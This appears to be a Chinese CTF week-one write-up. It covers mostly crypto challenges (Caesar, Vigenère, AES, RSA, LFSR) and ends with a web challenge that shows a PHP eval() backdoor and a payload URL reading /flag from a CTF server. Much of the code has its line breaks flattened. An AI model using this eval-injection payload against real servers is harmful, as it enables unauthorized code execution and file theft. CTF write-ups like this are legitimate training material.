npccctf第一周wp

news/2025/2/24 15:44:20/文章来源:https://www.cnblogs.com/ljnljn/p/18734223

1、全网呼叫密码人

题目

from Crypto.Cipher import AES
from Crypto.Util.number import *
from Crypto.Util.Padding import pad
"""
Dinzheng先生准备去买一根RuiKeV电子烟,在付款的时候忘记了它的支付密码。
还好他的朋友早有准备,留下了若干个密保问题,你能从中获取秘密的信息(flag)吗?
"""
flag=b"flag{?????}"assert len(flag)==64piece=[flag[i:i+8] for i in range(0,64,8)]#-----密保问题----- : 李唐王有可能是凯撒,但李唐王是凯撒不大可能
print(''.join(chr(piece[0][i]-2) for i in range(8)))
"""
dj_ey//)
flag{11+
"""#-----密保问题-----: 是谁来着...维十戴尔?王维那?哦哦哦!是维吉尼亚
"""
Ofqi ht wj, fdpsxvp, ityg cgux tqi egtbvvb. Lx ypfu iaov flt woa nc bngv ugt, uiv lqjtznp ut iweksgx hjrr stm cj dpk wp kft yivlpt. Pvge ut tfg zl qncarli asccrw, wsckf xl onc zjm ipzkpzwprzax. Kg jcawco kfxgy qw gi. Mvg uynl gvicivv qlr xg op vlsesuj txlhc. Jm lx uq rzdnh qlp exhvp rplyu, yygwza rupks qw mjk zkjraxgu rribhwuc ihkcib abtg.Rls mvg jcrhbf ggtvs kj "ztewg5!_"belie5!_
"""#-----密保问题----- : Avemujica rosElia raS
key =iv = b'1234567890123456';cipher = AES.new(key, AES.MODE_CBC, iv);ppiece = pad(piece[2], AES.block_size);print(cipher.encrypt(ppiece))
"""
b"'*\xc0m\xd0&\xcb\x18\xf3z\xfa\xf0n\xc9<\xf1"U_are_th
"""#-----密保问题----- : 密码人不语,只是一味的梭哈RSA。
print(long_to_bytes(pow(bytes_to_long(piece[3]),3,getPrime(512)**2)))
"""
b'\x0f\xe5Q\xa5_\x16q\xb0\x11\xbd\xdbO\xe803\xf7\xbf\x16R\xdd\xac\x1a\x96\xf9'e_best_i
"""#-----密保问题----- : 但是,RSA vs PACK,你知道吗?什么?不会吧?真的吗?怎么可能?
print(long_to_bytes(sum(int(str(bin(bytes_to_long(piece[4]))[2:])[i]) * [3**i for i in range(80)][i] for i in range(63))))
"""
b'\x07)\x19\x12D\x18\xdc\xf7r\xe1\x7f\xb0}'
n_crypto
"""#-----密保问题----- : 你的 N  我的 TRU
g=2**521-1;f=2*555;p=2**607-1
h=g*inverse(f,p)%p
c=(114514*h+bytes_to_long(piece[5]))%p
print(long_to_bytes(c))
"""b'v\x8bM\x07\xd7h\xb4\xd0}wY\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\xe5\x9d\x86\xd2\xe4\xd0\x06\xed'_challen
"""#-----密保问题----- : 你出的什么78密码?
"""
b'ge_and_have_fun}'
"""

第一部分:简单凯撒

words='dj_ey//)'
for i in range(len(words)):print(chr(ord(words[i])+2),end='')

第二部分:维吉尼亚密码

先初步筛选

'''维吉尼亚破解'''
import numpy as np
import wordninjadef alpha(cipher):  # 预处理,去掉空格以及回车c = ''for i in range(len(cipher)):if (cipher[i].isalpha()):c += cipher[i]return cdef count_IC(cipher):  # 给定字符串计算其重合指数count = [0 for i in range(26)]L = len(cipher)IC = 0.0for i in range(len(cipher)):if (cipher[i].isupper()):count[ord(cipher[i]) - ord('A')] += 1elif (cipher[i].islower()):count[ord(cipher[i]) - ord('a')] += 1for i in range(26):IC += (count[i] * (count[i] - 1)) / (L * (L - 1))return ICdef count_key_len(cipher, key_len):  # 对字符串按输入个数进行分组,计算每一组的IC值返回平均值N = ['' for i in range(key_len)]IC = [0 for i in range(key_len)]for i in range(len(cipher)):m = i % key_lenN[m] += cipher[i]for i in range(key_len):IC[i] = count_IC(N[i])# print(IC)print("长度为%d时,平均重合指数为%.5f" % (key_len, np.mean(IC)))return np.mean(IC)def length(cipher):  # 遍历确定最有可能的密钥长度返回密钥长度key_len = 0mins = 100aver = 0.0for i in range(1, 10):k = count_key_len(cipher, i)if (abs(k - 0.065) < mins):mins = abs(k - 0.065)key_len = iaver = kprint("密钥长度为%d,此时重合指数每组的平均值为%.5f" % (key_len, aver))return key_lendef count_MIC(c1, c2, n):  # n=k1-k2为偏移量,计算c1,c2互重合指数MICcount_1 = [0 for i in range(26)]count_2 = [0 for i in range(26)]L_1 = len(c1)L_2 = len(c2)MIC = 0for i in range(L_1):if (c1[i].isupper()):count_1[ord(c1[i]) - ord('A')] += 1elif (c1[i].islower()):count_1[ord(c1[i]) - ord('a')] += 1for i in range(L_2):if (c2[i].isupper()):count_2[(ord(c2[i]) - ord('A') + n + 26) % 26] += 1elif (c2[i].islower()):count_2[(ord(c2[i]) - ord('a') + n + 26) % 26] += 1for i in range(26):MIC += count_1[i] * count_2[i] / (L_1 * L_2)return MICdef count_n(c1, c2):  # 确定两个子串最优的相对偏移量n=k1-k2n = 0mins = 100k = [0.0 for i in range(26)]for i in range(26):k[i] = count_MIC(c1, c2, i)# print(i,k[i])if (abs(k[i] - 0.065) < mins):mins = abs(k[i] - 0.065)n = ireturn ndef group_k(cipher, key_len):  # 完成分组操作并计算每一组与第一组的最优相对偏移量并返回N = ['' for i in range(key_len)]MIC = [0 for i in range(key_len)]s = [0 for i in range(key_len)]for i in range(len(cipher)):  # 对密文进行分组m = i % key_lenN[m] += cipher[i]for i in range(1, key_len):  # 计算与第一组之间的相对偏移量s[i] = count_n(N[0], N[i])  # s[i] = k1-k(i+1)MIC[i] = count_MIC(N[0], N[i], s[i])  # MIC[i] = MIC(1,i+1)print("第1组和第%d组之间偏移为%d时,互重合指数为%.5f" % (i + 1, s[i], MIC[i]))return sdef miyao(key_len, s, k):  # k为第一个子串的移位,输出密钥并返回密钥所有字母的下标mi = ['' for i in range(key_len)]for i in range(key_len):s[i] = -s[i] + k  # k2=k1-nmi[i] = chr((s[i] + 26) % 26 + ord('a'))print("第一个偏移量为%d,密钥为%s时" % (k, mi))return sdef the_end(cipher, key_len, s):  # 输入密文密钥返回明文结果plain = ''i = 0while (i < len(cipher)):for j in range(key_len):if (cipher[i].isupper()):plain += chr((ord(cipher[i]) - ord('A') - s[j] + 26) % 26 + ord('A'))else:plain += chr((ord(cipher[i]) - ord('a') - s[j] + 26) % 26 + ord('a'))i += 1if (i == len(cipher)):break# print(plain)return plainif __name__ == "__main__":cipher = 'Ofqi ht wj, fdpsxvp, ityg cgux tqi egtbvvb. Lx ypfu iaov flt woa nc bngv ugt, uiv lqjtznp ut iweksgx hjrr stm cj dpk wp kft yivlpt. Pvge ut tfg zl qncarli asccrw, wsckf xl onc zjm ipzkpzwprzax. Kg jcawco kfxgy qw gi. Mvg uynl gvicivv qlr xg op vlsesuj txlhc. Jm lx uq rzdnh qlp exhvp rplyu, yygwza rupks qw mjk zkjraxgu rribhwuc ihkcib abtg.Rls mvg jcrhbf ggtvs kj "ztewg5!_"'cipher = alpha(cipher)key_len = length(cipher)s = group_k(cipher, key_len)m = s.copy()for k in range(26):s = m.copy()s = miyao(key_len, s, k)plain = the_end(cipher, key_len, s)print(plain[0:20])  # 输出部分明文确定偏移量k1print("参考输出,请输入第一个子串的偏移量:", end='')k = int(input())m = miyao(key_len, m, k)plain = the_end(cipher, key_len, m)'''对英文文本进行分词'''word = wordninja.split(plain)plain = ''for i in range(len(word)):plain += word[i]plain += ' 'print("明文为\n" + plain)
第一个偏移量为2,密钥为['c', 'r', 'y', 'e', 't', 'o']时
Moseofushzwevereakel

找到上面这个偏移量很可疑,联想可能密钥是crypto

参考输出,请输入第一个子串的偏移量:2
第一个偏移量为2,密钥为['c', 'r', 'y', 'e', 't', 'o']时
明文为
Mos e of us hz we vere ak eli qe for g canted He know e hato np day we xu st dip but usf ally wp pic tuc e that o aya sfl r in th p fu tur p When wp are in mu oya ne he a lts death ts all b ft uni ml gina b we We sew dom th tn kofi e The da js s tree ch out tna ne no less vt st a So he go ab zu tour a e tty tls k shac dl yawl re of of r list wes sate it ude eow ard wife A no these non dpi pc eisb p lie

image

第三部分:AES加密

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad# 给定的密钥和IV
key = iv = b'1234567890123456'# 给定的加密数据(以Python字面量的形式)
encrypted_data = b"'*\xc0m\xd0&\xcb\x18\xf3z\xfa\xf0n\xc9<\xf1"# 初始化AES解密对象
cipher = AES.new(key, AES.MODE_CBC, iv)# 解密数据
decrypted_padded = cipher.decrypt(encrypted_data)# 去填充
try:decrypted_data = unpad(decrypted_padded, AES.block_size)print("解密后的明文:", decrypted_data.decode())
except ValueError:print("解密后数据格式错误,可能是填充不正确或密钥/IV错误")

第四部分:RSA

from Crypto.Util.number import long_to_bytes, bytes_to_long
from gmpy2 import irootciphertext = b'\x0f\xe5Q\xa5_\x16q\xb0\x11\xbd\xdbO\xe803\xf7\xbf\x16R\xdd\xac\x1a\x96\xf9'
c = bytes_to_long(ciphertext)
m, is_exact = iroot(c, 3)
if is_exact:piece_3 = long_to_bytes(m)print(piece_3)
else:print("无法精确求解立方根")

第五部分:

from Crypto.Util.number import bytes_to_long, long_to_bytesoutput = b'\x07)\x19\x12D\x18\xdc\xf7r\xe1\x7f\xb0}'
S = bytes_to_long(output)bits = [0] * 63
remaining = Sfor i in reversed(range(63)):power = 3 ** iif power <= remaining:bits[i] = 1remaining -= powerif remaining == 0:break# 构造二进制字符串,i从0到62对应bits的索引0到62
bin_str = ''.join(map(str, bits))
integer = int(bin_str, 2)
piece_4 = long_to_bytes(integer)print(f"piece[4] = {piece_4}")

第六部分:

from Crypto.Util.number import long_to_bytes, bytes_to_long, inverseg = 2**521 - 1
f = 2 * 555
p = 2**607 - 1
h = g * inverse(f, p) % pciphertext = b'v\x8bM\x07\xd7h\xb4\xd0}wY\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\x86:\x1eqxc\xa1\xe7\x17\xe5\x9d\x86\xd2\xe4\xd0\x06\xed'
c = bytes_to_long(ciphertext)piece_5 = (c - 114514 * h) % p
piece_5_bytes = long_to_bytes(piece_5)
print(piece_5_bytes)

2、river

class LFSRStreamCipher:def __init__(self, key: int):if not (0 <= key < 2**16):raise ValueError("Key must be a 16-bit integer")self.state = keyself.poly = 0b1010000000000101  # 反馈多项式: x^16 + x^14 + x^13 + x^11 + 1def lfsr_step(self) -> int:feedback = self.state & 1self.state >>= 1if feedback:self.state ^= self.polyreturn feedbackdef generate_keystream(self, length: int) -> bytes:keystream = bytearray()for _ in range(length):byte = 0for i in range(8):byte |= self.lfsr_step() << ikeystream.append(byte)return bytes(keystream)def encrypt(self, plaintext: bytes) -> bytes:"""使用密钥流加密"""keystream = self.generate_keystream(len(plaintext))return bytes(p ^ k for p, k in zip(plaintext, keystream))def decrypt(self, ciphertext: bytes) -> bytes:"""使用密钥流解密(加密与解密是相同的)"""return self.encrypt(ciphertext)# 提供的密钥
key = 0b1101011010110101
cipher = LFSRStreamCipher(key)# 给定的密文(以十六进制字符串形式)
ciphertext_hex = "bd8b802f4a05ed77abace36b6cf9adbe627d3632edff818c556120ad131b50dbedd0f4af4483"
ciphertext = bytes.fromhex(ciphertext_hex)# 解密过程
decrypted_message = cipher.decrypt(ciphertext)print("Decrypted message:", decrypted_message)

3、kotlin?

玩到2048(什

4、play a game

找到可疑位置

image

用burpsuite爆破得到score是114514

得到这个

<?php
error_reporting(0);if (base64_encode($_GET['score']) == 'MTE0NTE0') {highlight_file(__FILE__);
}
else echo "MTE0NTE0说:你的分数不是它想要的";$func=$_GET['func'];
$arg=$_GET['arg'];
if($func!=$arg||md5($func)==md5($arg)){eval($func.$arg);
}?>

再构造就可以获得flag

http://175.27.249.18:30210/check.php?score=114514&func=echo%20file_get_contents(%27/flag%27);%2F%2F&arg=

image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/889054.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何利用CRM系统进行客户细分和精准营销?

如何利用CRM系统进行客户细分和精准营销?

——怎么做才能在CRM系统里对客户进行细分并精准营销呢? 我有一个朋友这么问我。 其实,想做到这个并不难,不过需要先明白这两个的核心概念是什么。简单来说,客户细分——根据客户的不同特点,把客户分成几个群体。 精准营销——根据这些细分好的群体,量身定制符合他们需求…
阅读更多...
文科生的我用DeepSeek+AI程序员半小时开发了一个小程序

文科生的我用DeepSeek+AI程序员半小时开发了一个小程序

作者:AI工具集 有时候我突发奇想要做个小工具,但是碍于不会编程,没办法进行下去。 但是学习编程要花很长时间,而且以我的水平,还不一定学得懂。我就在想,能不能通过AI生成一个网页、小程序或者App呢?经过实战手搓,发现真的可以!DeepSeek满血版“AI程序员” 正好我看见…
阅读更多...
优化性能钩子useMemo

优化性能钩子useMemo

执行顺序 useMemo 是同步执行,而 useEffect 是异步的。 import { useMemo, useState, useEffect } from react;function TestComponent() {const [count, setCount] = useState(0);console.log(普通代码:在渲染期间同步执行);useMemo(() => {console.log(useMemo:在渲染期…
阅读更多...
BUUCTF-Web方向21-25wp

BUUCTF-Web方向21-25wp

[HCTF 2018]admin 打开环境,有三处提示,一个跳转链接,一个登录注册,一个提示不是admin点击hctf,无法访问注册个账号,依旧无法查看,看来需要admin账号弱口令 爆破密码当密码未123长度明显不同登录session伪造 在修改密码界面,提示session下载该源码查看,index.php {% i…
阅读更多...
useMemo 与 useEffect

useMemo 与 useEffect

执行顺序 useMemo 是同步执行,而 useEffect 是异步的。 import { useMemo, useState, useEffect } from react;function TestComponent() {const [count, setCount] = useState(0);console.log(普通代码:在渲染期间同步执行);useMemo(() => {console.log(useMemo:在渲染期…
阅读更多...
测试用例管理工具2

测试用例管理工具2

一、bug的等级 (1)1级bug (致命bug) (2)2级bug(严重bug) (3)3级bug(一般bug) (4)4级bug(简易性bug)- 划分- 1级bug (致命bug):必须优先修改,在测试中较少出现,一旦出现应立即中止当前版本测试; 致命bug: (1)常规操作引起的崩溃,死机,死循环,内存泄…
阅读更多...
FPGA Assembly

FPGA Assembly

FASM 是一种文件格式,用于指定 FPGA 比特流中需要置1或清0的位。FASM 的设计初衷是提供一个中间层,令 FPGA 布局布线工具无需关心实际运行的 FPGA 比特流文件格式而工作。FASM 文件格式具有以下特性:从文件中删除任意一行都不会影响其有效性(注:这里的“有效性”指的是能正…
阅读更多...
Flink 实战之维表关联

Flink 实战之维表关联

生产应用中,经常遇到将实时 **流式数据** 与 **维表数据** 进行关联的场景。常见的维表关联方式有多种,本文对以下 3 种进行了实现,并对每种方法的优缺点进行了比较:1. 预加载维表 2. 异步 IO 3. 广播维表下面分别使用不同方式来完成维表 join 的实验,附源码和实时动效。F…
阅读更多...
Sa2VA环境搭建推理测试

Sa2VA环境搭建推理测试

引子 Sa2VA模型通过结合SAM-2和LLaVA,将文本、图像和视频统一到共享的LLM标记空间中,能够在少量指令微调下执行多种任务,如图像/视频对话、指称分割和字幕生成。该模型在视频编辑和内容创作中展现出强大的性能,在相关基准任务中达到了SOTA水平。OK,那就让我们开始吧。一、…
阅读更多...
20-bluecms代码审计、thinkphp相关知识cve和cnvd编号申请

20-bluecms代码审计、thinkphp相关知识cve和cnvd编号申请

1、对bluecms进行代码审计,分析复现文件上传、ssti模板注入、文件删除等漏洞 文件上传审计admin/tpl_manage.php 文件发现,在do_edit模块有三个参数(act = do_edit、tpl_name = 写入文件名称、tpl_content = 写入内容,且代码中未对文件名过滤,导致可以上传任意文件。查看对…
阅读更多...
ios SDK AB 开关切换

ios SDK AB 开关切换

在数据库的这个服务器 然后再ctest1数据库新建编辑器然后查询select* fromapp_config ac whereaccess_no = 12100186 //这个是应用IDand module = abSwitchand param_name = export_otel_ab查到后,把param_value改为B,或者A,然后回车,然后点击图中的保存 保存后等两分钟,…
阅读更多...
CS Course Learning

CS Course Learning

【李宏毅】2024大语言模型课程 课程学习课程链接:https://speech.ee.ntu.edu.tw/~hylee/genai/2024-spring.php Bilibili相关视频链接:https://www.bilibili.com/video/BV1XS411w7qrGPT: Autoregressive model In-context LearningChain of Thoughts (CoT) Tree of Thoughts …
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023